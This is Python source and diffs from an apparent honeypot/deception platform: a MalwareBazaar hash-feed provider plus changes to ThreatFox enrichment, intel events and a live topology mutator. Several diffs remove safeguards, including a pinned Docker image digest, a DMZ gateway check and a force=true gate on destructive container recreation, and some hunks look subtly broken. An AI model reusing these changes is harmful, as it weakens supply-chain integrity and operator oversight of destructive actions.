from decnet.intel.base import MalHashProvider
from decnet.logging import get_logger
from decnet.net.http import stealth_client
log = get_logger("intel.mal_hash")
_ENDPOINT = "https://bazaar.abuse.ch/export/csv/full/"
_DEFAULT_REFRESH_S = 86_400.0 # 24h — feed is daily, no need to hammer
_AUTH_KEY_ENV = "DECNET_MALWAREBAZAAR_AUTH_KEY"
_REFRESH_INTERVAL_ENV = "DECNET_MAL_HASH_REFRESH_INTERVAL_S"
def _read_refresh_interval() -> float:
raw = os.environ.get(_REFRESH_INTERVAL_ENV)
if raw is None:
return _DEFAULT_REFRESH_S
try:
return float(raw)
except ValueError:
log.warning(
"%s=%r not a float; falling back to default %.0f",
_REFRESH_INTERVAL_ENV, raw, _DEFAULT_REFRESH_S,
)
return _DEFAULT_REFRESH_S
class MalwareBazaarProvider(MalHashProvider):
"""Bulk SHA-256 lookup against MalwareBazaar's full export."""
name = "malwarebazaar"
def __init__(
self,
*,
auth_key: Optional[str] = None,
refresh_interval_s: Optional[float] = None,
) -> None:
self._auth_key = auth_key or os.environ.get(_AUTH_KEY_ENV) or None
self._refresh_interval_s = (
refresh_interval_s
if refresh_interval_s is not None
else _read_refresh_interval()
)
self._known: set[str] = set()
self._loaded_at: float = 0.0
self._last_error: Optional[str] = None
self._disabled_warned: bool = False
@property
def disabled(self) -> bool:
return self._auth_key is None
async def _refresh(self) -> Optional[str]:
"""Refetch the bulk feed. Returns an error string or ``None``."""
if self._auth_key is None:
return "no auth key"
try:
async with stealth_client(timeout=60.0) as client:
resp = await client.get(
_ENDPOINT, headers={"Auth-Key": self._auth_key},
)
except Exception as exc: # noqa: BLE001
return f"network: {exc}"
if resp.status_code != 200:
return f"HTTP {resp.status_code}"
body = resp.content
try:
new_known = _parse_dump(body)
except Exception as exc: # noqa: BLE001
return f"parse: {exc}"
if not new_known:
return "feed: empty"
self._known = new_known
self._loaded_at = time.monotonic()
self._last_error = None
log.info("malwarebazaar: refreshed bulk feed entries=%d", len(new_known))
return None
async def _ensure_fresh(self) -> None:
if self.disabled:
if not self._disabled_warned:
log.warning(
"R0046 mal_hash_match disabled: %s unset",
_AUTH_KEY_ENV,
)
self._disabled_warned = True
return
if (
not self._known
or (time.monotonic() - self._loaded_at) >= self._refresh_interval_s
):
err = await self._refresh()
if err:
self._last_error = err
log.warning("malwarebazaar refresh failed: %s", err)
async def is_known_bad(self, sha256: str) -> bool:
if self.disabled:
return False
try:
await self._ensure_fresh()
except Exception as exc: # noqa: BLE001
# Belt and braces: _ensure_fresh swallows refresh failures
# but a bug in there shouldn't blow up the ingester payload.
log.exception("malwarebazaar refresh raised: %s", exc)
return False
return sha256.lower() in self._known
def _parse_dump(body: bytes) -> set[str]:
"""Extract SHA-256 hashes from MalwareBazaar's full dump.
The endpoint returns a ZIP archive containing a single CSV with a
``sha256_hash`` column. Some abuse.ch flavours of the same feed
family ship plain CSV instead — handle both by sniffing the magic
bytes. Hashes are lowercased; non-hex / wrong-length values are
dropped (defense in depth — we set-membership-test by exact match).
"""
if body[:2] == b"PK":
with zipfile.ZipFile(io.BytesIO(body)) as zf:
csv_names = [n for n in zf.namelist() if n.lower().endswith(".csv")]
if not csv_names:
raise ValueError("zip has no .csv member")
with zf.open(csv_names[0]) as fh:
csv_bytes = fh.read()
else:
csv_bytes = body
text = csv_bytes.decode("utf-8", errors="replace")
return _extract_hashes(text)
def _extract_hashes(text: str) -> set[str]:
"""Pull the ``sha256_hash`` column out of MalwareBazaar's CSV.
The dump prefaces the table with ``#``-prefixed comment lines.
Skip those, find the header row, locate the column, then read the
rest. csv.reader handles the quoting (the ``signature`` column
contains commas and is properly quoted in the dump).
"""
body_lines = [
line for line in text.splitlines()
if line and not line.lstrip().startswith("#")
]
if not body_lines:
return set()
reader = csv.reader(body_lines)
header = next(reader, None)
if not header:
return set()
norm = [h.strip().strip('"').lower() for h in header]
try:
col = norm.index("sha256_hash")
except ValueError:
# Fallback — first column is sha256 in every documented
# variant; if the header naming changes upstream we still
# capture something rather than silently emptying the set.
col = 0
out: set[str] = set()
for row in reader:
if len(row) <= col:
continue
cell = row[col].strip().strip('"').lower()
if len(cell) == 64 and all(c in "0123456789abcdef" for c in cell):
out.add(cell)
return out

View File

@@ -12,6 +12,7 @@ caps requests/min — the provider works either way.
"""
from __future__ import annotations
import json
import os
from datetime import datetime, timezone
from typing import Optional
@@ -70,10 +71,7 @@ class ThreatFoxProvider(IntelProvider):
verdict=None, # absence is not a benign signal
column_updates={
"threatfox_listed": False,
"threatfox_threat_types": [],
"threatfox_ioc_types": [],
"threatfox_malware_families": [],
"threatfox_raw": {},
"threatfox_raw": "{}",
"threatfox_queried_at": datetime.now(timezone.utc),
},
)
@@ -85,37 +83,12 @@ class ThreatFoxProvider(IntelProvider):
data = payload.get("data") or []
listed = bool(data)
# Each match in ``data`` carries threat_type / ioc_type / malware
# (canonical family). The IntelLifter dispatches ATT&CK techniques
# off ``threat_type`` (botnet_cc / payload_delivery / payload /
# cc_skimming); the other two columns are evidence and SIEM
# context. Sets are flattened across matches and serialised
# sorted for determinism.
threat_types: set[str] = set()
ioc_types: set[str] = set()
families: set[str] = set()
if isinstance(data, list):
for entry in data:
if not isinstance(entry, dict):
continue
tt = entry.get("threat_type")
if isinstance(tt, str) and tt:
threat_types.add(tt)
it = entry.get("ioc_type")
if isinstance(it, str) and it:
ioc_types.add(it)
family = entry.get("malware") or entry.get("malware_printable")
if isinstance(family, str) and family:
families.add(family)
return IntelResult(
provider=self.name,
verdict="malicious" if listed else None,
column_updates={
"threatfox_listed": listed,
"threatfox_threat_types": sorted(threat_types),
"threatfox_ioc_types": sorted(ioc_types),
"threatfox_malware_families": sorted(families),
"threatfox_raw": data,
"threatfox_raw": json.dumps(data),
"threatfox_queried_at": datetime.now(timezone.utc),
},
)

View File

@@ -59,38 +59,6 @@ def _aggregate(verdicts: list[Optional[str]]) -> Optional[str]:
return None
def _build_intel_event_payload(
attacker_uuid: str,
ip: str,
row: dict[str, Any],
providers: list[IntelProvider],
) -> dict[str, Any]:
"""Project the AttackerIntel row into the bus event the TTP worker
consumes as ``source_kind="intel"``.
"""
return {
"attacker_uuid": attacker_uuid,
"attacker_ip": ip,
"aggregate_verdict": row.get("aggregate_verdict"),
"providers": [p.name for p in providers],
# AbuseIPDB
"abuseipdb_score": row.get("abuseipdb_score"),
"abuseipdb_categories": row.get("abuseipdb_categories") or [],
# GreyNoise
"greynoise_classification": row.get("greynoise_classification"),
"greynoise_name": row.get("greynoise_name"),
"greynoise_tags": row.get("greynoise_tags") or [],
# Feodo
"feodo_listed": row.get("feodo_listed"),
"feodo_malware_family": row.get("feodo_malware_family"),
# ThreatFox
"threatfox_listed": row.get("threatfox_listed"),
"threatfox_threat_types": row.get("threatfox_threat_types") or [],
"threatfox_ioc_types": row.get("threatfox_ioc_types") or [],
"threatfox_malware_families": row.get("threatfox_malware_families") or [],
}
async def _enrich_one(
attacker_uuid: str,
ip: str,
@@ -204,9 +172,12 @@ async def run_intel_loop(
await publish_safely(
bus,
_topics.attacker(_topics.ATTACKER_INTEL_ENRICHED),
_build_intel_event_payload(
attacker_uuid, ip, row, providers,
),
{
"attacker_uuid": attacker_uuid,
"attacker_ip": ip,
"aggregate_verdict": row.get("aggregate_verdict"),
"providers": [p.name for p in providers],
},
event_type=_topics.ATTACKER_INTEL_ENRICHED,
)
except Exception: # noqa: BLE001
@@ -229,11 +200,11 @@ async def run_intel_loop(
t.cancel()
if heartbeat_task is not None:
heartbeat_task.cancel()
for task in (*wake_tasks, heartbeat_task):
if task is None:
for t in (*wake_tasks, heartbeat_task):
if t is None:
continue
with contextlib.suppress(asyncio.CancelledError, Exception):
await task
await t
if bus is not None:
with contextlib.suppress(Exception):
await bus.close()

View File

@@ -28,7 +28,7 @@ class _ComponentFilter(logging.Filter):
self.component = component
def filter(self, record: logging.LogRecord) -> bool:
record.decnet_component = self.component
record.decnet_component = self.component # type: ignore[attr-defined]
return True
@@ -49,14 +49,14 @@ class _TraceContextFilter(logging.Filter):
span = trace.get_current_span()
ctx = span.get_span_context()
if ctx and ctx.trace_id:
record.otel_trace_id = format(ctx.trace_id, "032x")
record.otel_span_id = format(ctx.span_id, "016x")
record.otel_trace_id = format(ctx.trace_id, "032x") # type: ignore[attr-defined]
record.otel_span_id = format(ctx.span_id, "016x") # type: ignore[attr-defined]
else:
record.otel_trace_id = "0"
record.otel_span_id = "0"
record.otel_trace_id = "0" # type: ignore[attr-defined]
record.otel_span_id = "0" # type: ignore[attr-defined]
except Exception:
record.otel_trace_id = "0"
record.otel_span_id = "0"
record.otel_trace_id = "0" # type: ignore[attr-defined]
record.otel_span_id = "0" # type: ignore[attr-defined]
return True

View File

@@ -91,7 +91,7 @@ class DeckyConfig(BaseModel):
services: list[str] = PydanticField(..., min_length=1)
distro: str # slug from distros.DISTROS, e.g. "debian", "ubuntu22"
base_image: str # Docker image for the base/IP-holder container
build_base: str = "debian:bookworm-slim@sha256:f9c6a2fd2ddbc23e336b6257a5245e31f996953ef06cd13a59fa0a1df2d5c252" # apt-compatible image for service Dockerfiles; digest pinned via distros.py
build_base: str = "debian:bookworm-slim" # apt-compatible image for service Dockerfiles
hostname: str
archetype: str | None = None # archetype slug if spawned from an archetype profile
service_config: dict[str, dict] = PydanticField(default_factory=dict)

View File

@@ -101,10 +101,7 @@ async def mutate_decky(
try:
# Wrap blocking call in thread
cp = compose_path
await anyio.to_thread.run_sync(
lambda: _compose_with_retry("up", "-d", "--remove-orphans", compose_file=cp)
)
await anyio.to_thread.run_sync(_compose_with_retry, "up", "-d", "--remove-orphans", compose_path)
except Exception as e:
log.error("mutation failed decky=%s error=%s", decky_name, e)
console.print(f"[red]Failed to mutate '{decky_name}': {e}[/]")
@@ -164,8 +161,6 @@ async def mutate_all(
if force or only is not None:
due = True
else:
if interval_mins is None:
continue
elapsed_secs = now - decky.last_mutated
due = elapsed_secs >= (interval_mins * 60)
remaining = (interval_mins * 60) - elapsed_secs
@@ -289,13 +284,13 @@ async def reconcile_agent_resyncs(repo: BaseRepository) -> int:
return 0
drained = 0
for topo in pending:
tid = topo.id
tid = topo["id"]
try:
await _deployer.resync_agent_topology(repo, tid)
await repo.set_topology_resync(tid, False)
drained += 1
log.info("topology %s resynced to agent %s",
tid, topo.target_host_uuid)
tid, topo.get("target_host_uuid"))
except Exception as exc: # noqa: BLE001
log.warning(
"topology %s resync failed (will retry): %s", tid, exc,
@@ -410,11 +405,11 @@ async def run_watch_loop(repo: BaseRepository, poll_interval_secs: int = 10) ->
t.cancel()
if heartbeat_task is not None:
heartbeat_task.cancel()
for task in (*wake_tasks, heartbeat_task):
if task is None:
for t in (*wake_tasks, heartbeat_task):
if t is None:
continue
with contextlib.suppress(asyncio.CancelledError, Exception):
await task
await t
if bus is not None:
with contextlib.suppress(Exception):
await bus.close()

View File

@@ -98,463 +98,6 @@ def _decky_by_name(hydrated: dict[str, Any], name: str) -> Optional[dict]:
)
async def _materialise_lan_change(
repo: Any,
topology_id: str,
*,
created: Optional[tuple[str, str, bool]] = None,
removed: Optional[str] = None,
) -> None:
"""Create or remove the docker bridge for a live LAN op + re-render compose.
Called from ``apply_add_lan`` / ``apply_remove_lan`` after the DB
write lands. Skips when:
* the topology is not active/degraded (a pending topology gets its
networks created at deploy time),
* the topology is pinned to a swarm agent (cross-host materialisation
isn't implemented; the agent's apply_topology RPC re-renders the
whole compose at next push),
* the docker SDK / networking primitive raises (logged, not
re-raised — the DB row is the source of truth).
"""
topology = await repo.get_topology(topology_id)
if topology is None:
return
status = topology.status
if status not in ("active", "degraded"):
return
if topology.target_host_uuid:
_log.info(
"live LAN op skipped (agent-pinned topology=%s); next agent push will reconcile",
topology_id,
)
return
# Lazy imports — these pull in docker.py / network.py which both
# require the docker SDK; keeping them out of module-import keeps
# the mutator usable in test environments that stub docker.
import docker
from decnet.engine.deployer import _topology_compose_path
from decnet.network import create_bridge_network, remove_bridge_network
from decnet.topology.compose import _network_name, write_topology_compose
client = docker.from_env()
try:
if created is not None:
name, subnet, is_dmz = created
net_name = _network_name(topology_id, name)
try:
create_bridge_network(
client, net_name, subnet, internal=not is_dmz,
)
except Exception as exc: # noqa: BLE001
_log.error(
"live add_lan: bridge create failed topology=%s lan=%s subnet=%s: %s",
topology_id, name, subnet, exc,
)
# Don't re-raise — the DB row is the source of truth.
# Operator can retry by removing + re-adding the LAN.
if removed is not None:
net_name = _network_name(topology_id, removed)
try:
remove_bridge_network(client, net_name)
except Exception as exc: # noqa: BLE001
_log.warning(
"live remove_lan: bridge remove failed topology=%s lan=%s: %s",
topology_id, removed, exc,
)
# Re-render compose so the file on disk matches the DB. Even
# when the bridge create above failed, a future redeploy will
# try to bring the network back from the compose definition.
hydrated = await hydrate(repo, topology_id)
if hydrated is not None:
try:
write_topology_compose(
hydrated, _topology_compose_path(topology_id),
)
except Exception as exc: # noqa: BLE001
_log.warning(
"live LAN op: compose re-render failed topology=%s: %s",
topology_id, exc,
)
except Exception as exc: # noqa: BLE001 — outer net for any docker SDK failure
_log.error(
"live LAN materialisation crashed topology=%s: %s",
topology_id, exc,
)
def _is_buildx_wedge(exc: BaseException) -> bool:
"""True when *exc* looks like the buildx EROFS wedge.
We consult both the structured CalledProcessError.stderr and the
str(exc) form because ``_compose_with_retry`` raises a synthetic
CalledProcessError whose ``stderr`` contains the recovery hint
(which preserves the wedge signatures verbatim).
"""
from decnet.engine.deployer import (
_BUILDX_EROFS_SIGNATURE, _BUILDX_WEDGE_SIGNATURE,
)
stderr = ""
if hasattr(exc, "stderr") and exc.stderr:
stderr = str(exc.stderr)
haystack = (stderr + " " + str(exc)).lower()
return (
_BUILDX_WEDGE_SIGNATURE in haystack
and _BUILDX_EROFS_SIGNATURE in haystack
)
async def _compose_up_with_buildkit_fallback(
*args: str, compose_file, label: str,
) -> None:
"""Run ``compose up`` and auto-fall-back to the legacy builder on wedge.
The buildx activity dir occasionally lands on a read-only mount —
happens enough on operator dev boxes that we don't want a single
wedge to abort a live decky-add. When _compose_with_retry raises
with the EROFS-wedge signatures, we retry once with
``DOCKER_BUILDKIT=0`` set. The legacy (non-buildx) builder doesn't
use the activity dir and isn't affected.
*label* is a human-readable identifier used only in log lines so an
operator can grep the fall-back back to the originating op.
"""
import anyio
from decnet.engine.deployer import _compose_with_retry
try:
await anyio.to_thread.run_sync(
lambda: _compose_with_retry(*args, compose_file=compose_file),
)
return
except Exception as exc: # noqa: BLE001
if not _is_buildx_wedge(exc):
raise
_log.warning(
"%s: buildx wedge detected; retrying with DOCKER_BUILDKIT=0 "
"(legacy builder). Recover the buildx state at your leisure: "
"rm -rf ~/.docker/buildx/activity && "
"docker buildx create --name decnet-builder --use --bootstrap",
label,
)
# Outside the except so the second attempt's traceback isn't
# nested under the first failure if it also blows up.
await anyio.to_thread.run_sync(
lambda: _compose_with_retry(
*args, compose_file=compose_file,
env={"DOCKER_BUILDKIT": "0"},
),
)
def _decky_targets(decky_name: str, services: list[str]) -> list[str]:
"""Compose service names for one decky: base + each per-decky service.
Skips ``fleet_singleton`` services — those run once fleet-wide and
don't have a per-decky compose entry. Mirrors the same filter
applied at compose-render time
(:mod:`decnet.topology.compose.generate_topology_compose`).
"""
from decnet.services.registry import get_service
targets = [decky_name]
for svc_name in services:
try:
svc = get_service(svc_name)
except KeyError:
# Unknown service — leave it; the compose render won't emit
# a fragment for it, so compose up will simply ignore the
# name with a clear "no such service" error. Surface that
# rather than silently dropping it.
targets.append(f"{decky_name}-{svc_name}")
continue
if svc.fleet_singleton:
continue
targets.append(f"{decky_name}-{svc_name}")
return targets
async def _live_topology_or_none(
repo: Any, topology_id: str,
) -> Optional[dict[str, Any]]:
"""Return the topology row only when it's eligible for live materialisation.
Returns None (so callers can skip with a single ``if`` check) when:
* the topology doesn't exist;
* status is not ``active`` or ``degraded`` (pending topologies get
everything materialised at deploy time);
* the topology is pinned to a swarm agent (cross-host live editing
is its own routing workstream).
"""
topology = await repo.get_topology(topology_id)
if topology is None:
return None
if topology.status not in ("active", "degraded"):
return None
if topology.target_host_uuid:
_log.info(
"live decky op skipped (agent-pinned topology=%s); "
"next agent push will reconcile",
topology_id,
)
return None
return topology
async def _rerender_compose(repo: Any, topology_id: str) -> None:
"""Re-render the per-topology compose file from the current DB.
Called after each materialisation step so the file on disk matches
the topology rows. Soft-fails: a render error is logged but
doesn't poison the DB-side mutation.
"""
from decnet.engine.deployer import _topology_compose_path
from decnet.topology.compose import write_topology_compose
hydrated = await hydrate(repo, topology_id)
if hydrated is None:
return
try:
write_topology_compose(hydrated, _topology_compose_path(topology_id))
except Exception as exc: # noqa: BLE001
_log.warning(
"live op: compose re-render failed topology=%s: %s",
topology_id, exc,
)
async def _materialise_decky_spawn(
repo: Any, topology_id: str, decky_name: str, services: list[str],
) -> bool:
"""compose up -d --no-deps --build for one decky (base + services).
Re-renders compose first so the file lists the new decky. Returns
True when compose-up reported success, False otherwise (or when
the topology isn't eligible for live materialisation — pending
topologies skip and return False so the caller doesn't flip the
state to ``running`` based on a no-op). Best-effort: docker
failure is logged, not re-raised — DB row is the source of truth.
"""
if await _live_topology_or_none(repo, topology_id) is None:
return False
from decnet.engine.deployer import _topology_compose_path
await _rerender_compose(repo, topology_id)
targets = _decky_targets(decky_name, services)
compose_path = _topology_compose_path(topology_id)
try:
await _compose_up_with_buildkit_fallback(
"up", "-d", "--no-deps", "--build", *targets,
compose_file=compose_path,
label=f"live add_decky topology={topology_id} decky={decky_name}",
)
return True
except Exception as exc: # noqa: BLE001
_log.error(
"live add_decky: compose up failed topology=%s decky=%s: %s",
topology_id, decky_name, exc,
)
return False
async def _materialise_decky_remove(
repo: Any, topology_id: str, decky_name: str, services: list[str],
) -> None:
"""compose stop + rm -f for one decky's containers, then re-render."""
if await _live_topology_or_none(repo, topology_id) is None:
return
import anyio
from decnet.engine.deployer import _compose, _topology_compose_path
targets = _decky_targets(decky_name, services)
compose_path = _topology_compose_path(topology_id)
# Stop + rm BEFORE re-rendering compose; the re-rendered file no
# longer mentions the decky, so a stop run AFTER rendering would
# find no service to act on.
try:
await anyio.to_thread.run_sync(
lambda: _compose("stop", *targets, compose_file=compose_path),
)
except Exception as exc: # noqa: BLE001
_log.warning(
"live remove_decky: compose stop failed topology=%s decky=%s: %s",
topology_id, decky_name, exc,
)
try:
await anyio.to_thread.run_sync(
lambda: _compose("rm", "-f", *targets, compose_file=compose_path),
)
except Exception as exc: # noqa: BLE001
_log.warning(
"live remove_decky: compose rm failed topology=%s decky=%s: %s",
topology_id, decky_name, exc,
)
await _rerender_compose(repo, topology_id)
async def _materialise_decky_connect(
repo: Any, topology_id: str,
decky_name: str, lan_name: str, ipv4_address: str,
) -> None:
"""SDK ``network.connect`` to multi-home a running base container.
Service containers share the base's netns via ``network_mode:
service:<base>`` (see :mod:`decnet.topology.compose`), so attaching
the base alone gives every service container the new interface for
free — we don't need to iterate.
"""
if await _live_topology_or_none(repo, topology_id) is None:
return
import docker
from decnet.topology.compose import _container_name, _network_name
net_name = _network_name(topology_id, lan_name)
container_name = _container_name(topology_id, decky_name)
try:
client = docker.from_env()
net = client.networks.get(net_name)
container = client.containers.get(container_name)
net.connect(container, ipv4_address=ipv4_address)
except docker.errors.APIError as exc:
# Idempotency — already on the network is fine.
msg = str(exc).lower()
if "already" in msg or "endpoint" in msg and "exists" in msg:
_log.info(
"live attach_decky: %s already on network %s — skipping",
container_name, net_name,
)
else:
_log.error(
"live attach_decky: connect failed topology=%s decky=%s lan=%s: %s",
topology_id, decky_name, lan_name, exc,
)
except Exception as exc: # noqa: BLE001
_log.error(
"live attach_decky: SDK call crashed topology=%s decky=%s lan=%s: %s",
topology_id, decky_name, lan_name, exc,
)
await _rerender_compose(repo, topology_id)
async def _materialise_decky_disconnect(
repo: Any, topology_id: str, decky_name: str, lan_name: str,
) -> None:
"""SDK ``network.disconnect`` to drop a multi-home edge."""
if await _live_topology_or_none(repo, topology_id) is None:
return
import docker
from decnet.topology.compose import _container_name, _network_name
net_name = _network_name(topology_id, lan_name)
container_name = _container_name(topology_id, decky_name)
try:
client = docker.from_env()
net = client.networks.get(net_name)
container = client.containers.get(container_name)
net.disconnect(container)
except docker.errors.APIError as exc:
msg = str(exc).lower()
if "not connected" in msg or "no such" in msg:
_log.info(
"live detach_decky: %s already off network %s — skipping",
container_name, net_name,
)
else:
_log.error(
"live detach_decky: disconnect failed topology=%s decky=%s lan=%s: %s",
topology_id, decky_name, lan_name, exc,
)
except Exception as exc: # noqa: BLE001
_log.error(
"live detach_decky: SDK call crashed topology=%s decky=%s lan=%s: %s",
topology_id, decky_name, lan_name, exc,
)
await _rerender_compose(repo, topology_id)
async def _materialise_decky_services_diff(
repo: Any, topology_id: str,
decky_name: str,
added: list[str],
removed: list[str],
) -> None:
"""Add/remove per-service containers without touching siblings.
Mirrors :mod:`decnet.engine.services_live`'s up/down pattern but
without coupling the mutator to that module — service mutations
routed via the mutator queue publish ``mutation.applied`` while the
direct API publishes ``decky.<name>.service_added``; they share
machinery, not control flow.
"""
if not added and not removed:
return
if await _live_topology_or_none(repo, topology_id) is None:
return
import anyio
from decnet.engine.deployer import _compose, _topology_compose_path
await _rerender_compose(repo, topology_id)
compose_path = _topology_compose_path(topology_id)
add_targets = _decky_targets(decky_name, list(added))[1:] # drop the base
if add_targets:
try:
await _compose_up_with_buildkit_fallback(
"up", "-d", "--no-deps", "--build", *add_targets,
compose_file=compose_path,
label=f"live update_decky add topology={topology_id} decky={decky_name}",
)
except Exception as exc: # noqa: BLE001
_log.error(
"live update_decky add: compose up failed topology=%s decky=%s: %s",
topology_id, decky_name, exc,
)
rm_targets = _decky_targets(decky_name, list(removed))[1:]
for action_name, args in (("stop", ("stop",)), ("rm", ("rm", "-f"))):
if not rm_targets:
break
try:
await anyio.to_thread.run_sync(
lambda args=args: _compose(*args, *rm_targets, compose_file=compose_path), # type: ignore[misc]
)
except Exception as exc: # noqa: BLE001
_log.warning(
"live update_decky %s failed topology=%s decky=%s: %s",
action_name, topology_id, decky_name, exc,
)
async def _materialise_decky_recreate_base(
repo: Any, topology_id: str, decky_name: str,
) -> None:
"""Force-recreate just the base container (used for forwards_l3 flips).
DESTRUCTIVE: kills any in-container state on the base. Service
containers re-attach via ``network_mode: service:<base>`` after the
base is rebuilt. Caller is responsible for gating this on an
explicit operator-supplied ``force=true`` flag.
"""
if await _live_topology_or_none(repo, topology_id) is None:
return
import anyio
from decnet.engine.deployer import (
_compose_with_retry, _topology_compose_path,
)
await _rerender_compose(repo, topology_id)
compose_path = _topology_compose_path(topology_id)
try:
await anyio.to_thread.run_sync(
lambda: _compose_with_retry(
"up", "-d", "--no-deps", "--force-recreate", decky_name,
compose_file=compose_path,
),
)
except Exception as exc: # noqa: BLE001
_log.error(
"live update_decky recreate_base failed topology=%s decky=%s: %s",
topology_id, decky_name, exc,
)
# ------------------------------------------------------------------- ops
@@ -588,16 +131,6 @@ async def apply_add_lan(
"y": payload.get("y"),
}
)
# Live materialisation: when the topology is active/degraded, create
# the docker bridge network now and re-render the per-topology
# compose file so subsequent ``apply_add_decky`` writes a coherent
# services map. Pending topologies skip this — the next deploy
# creates everything from scratch. Agent-pinned topologies also
# skip; live editing on agents is its own routing problem.
await _materialise_lan_change(
repo, topology_id, created=(name, subnet, is_dmz),
)
await _assert_valid_after(repo, topology_id)
@@ -617,17 +150,7 @@ async def apply_remove_lan(
f"LAN {lan['name']!r} is the home LAN of decky "
f"{d['decky_config']['name']!r}; remove the decky first"
)
lan_name = lan["name"]
# enforce_pending=False: the mutator queue is the live-editing
# surface, gated on topology status by us before we got here. The
# repo's pending-only guard is for HTTP CRUD callers that mustn't
# bypass it.
await repo.delete_lan(lan["id"], enforce_pending=False)
# Live materialisation symmetric to apply_add_lan: tear down the
# docker bridge and re-render compose so a future redeploy doesn't
# try to wire deckies into a network that no longer exists.
await _materialise_lan_change(repo, topology_id, removed=lan_name)
await repo.delete_lan(lan["id"])
await _assert_valid_after(repo, topology_id)
@@ -681,12 +204,11 @@ async def apply_add_decky(
if forwards_l3:
decky_config["forwards_l3"] = True
services_list = list(payload.get("services", []))
decky_uuid = await repo.add_topology_decky(
{
"topology_id": topology_id,
"name": name,
"services": services_list,
"services": list(payload.get("services", [])),
"decky_config": decky_config,
"x": payload.get("x"),
"y": payload.get("y"),
@@ -701,25 +223,6 @@ async def apply_add_decky(
"forwards_l3": forwards_l3,
}
)
# Live materialisation: spawn the new decky's containers without
# touching siblings. Skips on pending / agent-pinned topologies —
# see _live_topology_or_none.
spawned = await _materialise_decky_spawn(
repo, topology_id, name, services_list,
)
# Flip the row's state to 'running' on success so the dashboard's
# ACTIVE DECKIES count reflects reality. Without this the row
# stays at the default 'pending' forever; the deployer's full
# post-deploy reconcile only runs on a fresh deploy_topology.
if spawned:
try:
await repo.update_topology_decky(decky_uuid, {"state": "running"})
except Exception as exc: # noqa: BLE001
_log.warning(
"live add_decky: state flip to running failed "
"topology=%s decky=%s: %s",
topology_id, name, exc,
)
await _assert_valid_after(repo, topology_id)
@@ -783,16 +286,6 @@ async def apply_attach_decky(
"forwards_l3": forwards_l3,
}
)
# Live materialisation: SDK network.connect on the base container.
# Service containers share the base's netns via network_mode:
# service:<base>, so they inherit the new interface — only the base
# needs the connect.
await _materialise_decky_connect(
repo, topology_id,
decky_name=decky["decky_config"]["name"],
lan_name=lan["name"],
ipv4_address=ip,
)
await _assert_valid_after(repo, topology_id)
@@ -836,15 +329,7 @@ async def apply_detach_decky(
await repo.update_topology_decky(
decky["uuid"], {"decky_config": new_cfg}
)
await repo.delete_topology_edge(edge["id"], enforce_pending=False)
# Live materialisation: SDK network.disconnect on the base
# container. Service containers automatically lose visibility into
# the LAN because they share the base's netns.
await _materialise_decky_disconnect(
repo, topology_id,
decky_name=decky["decky_config"]["name"],
lan_name=lan["name"],
)
await repo.delete_topology_edge(edge["id"])
await _assert_valid_after(repo, topology_id)
@@ -855,15 +340,7 @@ async def apply_remove_decky(
decky = _decky_by_name(hydrated, payload["decky"])
if decky is None:
raise MutationError(f"decky {payload['decky']!r} not found")
decky_name = decky["decky_config"]["name"]
services_list = list(decky.get("services") or [])
await repo.delete_topology_decky(decky["uuid"], enforce_pending=False)
# Live materialisation: stop + rm -f the decky's containers. We
# capture decky_name + services BEFORE the delete so the helper
# has the targets even though the row is gone.
await _materialise_decky_remove(
repo, topology_id, decky_name, services_list,
)
await repo.delete_topology_decky(decky["uuid"])
await _assert_valid_after(repo, topology_id)
@@ -877,136 +354,31 @@ async def apply_update_decky(
``patch`` — dict merged into existing ``decky_config``.
``services`` — replacement top-level services list.
``x``,``y`` — layout coords.
``force`` — opt-in for destructive recreates (currently
required when ``forwards_l3`` flips on a
live topology — see below).
Live materialisation strategy:
* **services changed** → diff old vs new; ``compose up -d`` for
added, ``compose stop`` + ``rm -f`` for removed. Mirrors the
direct API path (services_live) without coupling.
* **forwards_l3 flipped** → port publishing changes, which docker
can only apply at container-create time. Requires recreating
the base — destructive (kills in-container state, drops active
sessions). Gated on ``payload['force'] is True``; otherwise we
raise ``MutationError`` so a half-thinking operator doesn't
stomp a live decky.
* **only coords (x/y)** → DB-only. No docker work.
"""
hydrated = await _hydrated(repo, topology_id)
decky = _decky_by_name(hydrated, payload["decky"])
if decky is None:
raise MutationError(f"decky {payload['decky']!r} not found")
# Capture pre-state so we can compute the diff after the DB write.
old_services = list(decky.get("services") or [])
old_cfg = decky.get("decky_config") or {}
old_forwards_l3 = bool(old_cfg.get("forwards_l3", False))
patch: dict[str, Any] = {}
new_decky_config = old_cfg
if payload.get("patch"):
new_decky_config = {**old_cfg, **payload["patch"]}
patch["decky_config"] = new_decky_config
new_services = old_services
merged = dict(decky["decky_config"])
merged.update(payload["patch"])
patch["decky_config"] = merged
if "services" in payload:
new_services = list(payload["services"])
patch["services"] = new_services
patch["services"] = list(payload["services"])
for key in ("x", "y"):
if key in payload:
patch[key] = payload[key]
if not patch:
return
new_forwards_l3 = bool(new_decky_config.get("forwards_l3", False))
forwards_l3_flipped = new_forwards_l3 != old_forwards_l3
# Promotion path: refuse to flip a non-DMZ decky to gateway. The
# 'gateway' semantic specifically means 'host-port publisher facing
# the DMZ' — running it on an internal LAN publishes ports the
# outside world can't reach and shadows the host's port space.
# Generic L3-bridge forwards_l3 (internal multi-homing) is set by
# the generator/attach paths, not by this op, so this check only
# fires when the operator explicitly toggles the flag.
if forwards_l3_flipped and new_forwards_l3:
# Re-derive the home LAN from the edges; same logic as
# check_gateway_homed_in_dmz.
decky_uuid = decky["uuid"]
home_lan_id: Optional[str] = None
for e in hydrated["edges"]:
if e["decky_uuid"] == decky_uuid and e.get("is_bridge") is False:
home_lan_id = e["lan_id"]
break
if home_lan_id is None:
for e in hydrated["edges"]:
if e["decky_uuid"] == decky_uuid:
home_lan_id = e["lan_id"]
break
home_lan = next(
(lan for lan in hydrated["lans"] if lan["id"] == home_lan_id),
None,
)
if home_lan is None or not home_lan.get("is_dmz"):
home_name = home_lan["name"] if home_lan else "(unknown)"
raise MutationError(
f"cannot promote decky {decky['decky_config']['name']!r} "
f"to gateway: home LAN {home_name!r} is not a DMZ. "
"Move the decky to the DMZ first, or pick a different decky."
)
# Pre-check the destructive flip BEFORE any DB write, so a refused
# mutation leaves zero side-effects.
is_live = (await _live_topology_or_none(repo, topology_id)) is not None
if is_live and forwards_l3_flipped and not bool(payload.get("force")):
raise MutationError(
f"forwards_l3 flip on live decky "
f"{decky['decky_config']['name']!r} requires force=true; "
"this will recreate the base container and drop in-container state"
)
await repo.update_topology_decky(decky["uuid"], patch)
# Materialisation — only when the topology is actually live.
# _live_topology_or_none was already called above; calling the
# individual helpers re-checks (cheap) so they stay self-contained.
